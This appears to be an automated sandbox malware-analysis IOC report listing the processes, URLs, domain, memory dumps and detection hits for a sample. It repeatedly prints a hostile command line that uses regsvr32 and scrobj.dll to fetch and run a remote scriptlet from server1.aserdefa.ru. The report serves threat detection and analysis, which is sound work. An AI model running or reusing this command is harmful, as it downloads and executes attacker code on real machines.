Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

C:\Windows\SysWOW64\cmd.exe

cmd /C "regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll"

Details

Is windows:	true
Is dropped:	false
PID:	6756
Target ID:	0
Parent PID:	5500
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\SysWOW64\cmd.exe
Commandline:	cmd /C "regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll"
Size:	236544
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Time:	13:54:28
Date:	29/11/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x240000
Modulesize:	368640
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Execute Scriptlet from internet Via Regsvr32	Persistence and Installation Behavior	Regsvr32
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	4144
Target ID:	1
Parent PID:	6756
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	13:54:28
Date:	29/11/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7699e0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll

Details

Is windows:	true
Is dropped:	false
PID:	5332
Target ID:	2
Parent PID:	6756
Name:	regsvr32.exe
Class:	system-tools
Path:	C:\Windows\SysWOW64\regsvr32.exe
Commandline:	regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll
Size:	20992
MD5:	878E47C8656E53AE8A8A21E927C6F7E0
Time:	13:54:29
Date:	29/11/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x8a0000
Modulesize:	36864
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Registers a DLL	Data Obfuscation	Regsvr32
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32	System Summary
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://server1.aserdefa.ru/

unknown

Details

Name:	http://server1.aserdefa.ru/
TargetID:	2
From Memory:	true
Current Path:	C:\Windows\SysWOW64\regsvr32.exe
Source:	regsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmp

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Execute Scriptlet from internet Via Regsvr32	Persistence and Installation Behavior	Regsvr32
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Registers a DLL	Data Obfuscation	Regsvr32
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

http://server1.aserdefa.ru/deploy.xml

unknown

Details

Name:	http://server1.aserdefa.ru/deploy.xml
TargetID:	2
From Memory:	true
Current Path:	C:\Windows\SysWOW64\regsvr32.exe
Source:	regsvr32.exe, 00000002.00000002.1666837180.00000000004C0000.00000004.00000020.00020000.00000000.sdmp

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Execute Scriptlet from internet Via Regsvr32	Persistence and Installation Behavior	Regsvr32
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Registers a DLL	Data Obfuscation	Regsvr32
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

http://server1.aserdefa.ru/deploy.xmly

unknown

http://server1.aserdefa.ru/deploy.xmlscrobj.dll5

unknown

http://server1.aserdefa.ru/deploy.xml4

unknown

Domains

Name

Malicious

server1.aserdefa.ru

unknown

Details

Name:	server1.aserdefa.ru
TargetID:	-1

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Execute Scriptlet from internet Via Regsvr32	Persistence and Installation Behavior	Regsvr32
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Registers a DLL	Data Obfuscation	Regsvr32
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32	System Summary
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)	Networking
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

51F000

heap

page read and write

447E000

stack

page read and write

160000

heap

page read and write

4CA000

heap

page read and write

44BE000

stack

page read and write

400F000

stack

page read and write

F9000

stack

page read and write

1FE000

stack

page read and write

4A0000

heap

page read and write

506000

heap

page read and write

3FCE000

stack

page read and write

180000

heap

page read and write

532000

heap

page read and write

3F0D000

stack

page read and write

3E8E000

stack

page read and write

175000

heap

page read and write

490000

heap

page read and write

518000

heap

page read and write

BB000

stack

page read and write

170000

heap

page read and write

4EB000

heap

page read and write

4030000

heap

page read and write

3F4E000

stack

page read and write

43E000

stack

page read and write

43CE000

stack

page read and write

440F000

stack

page read and write

47E000

stack

page read and write

3F8E000

stack

page read and write

3ECC000

stack

page read and write

4C0000

heap

page read and write

There are 20 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report

Processes

URLs

Domains

Memdumps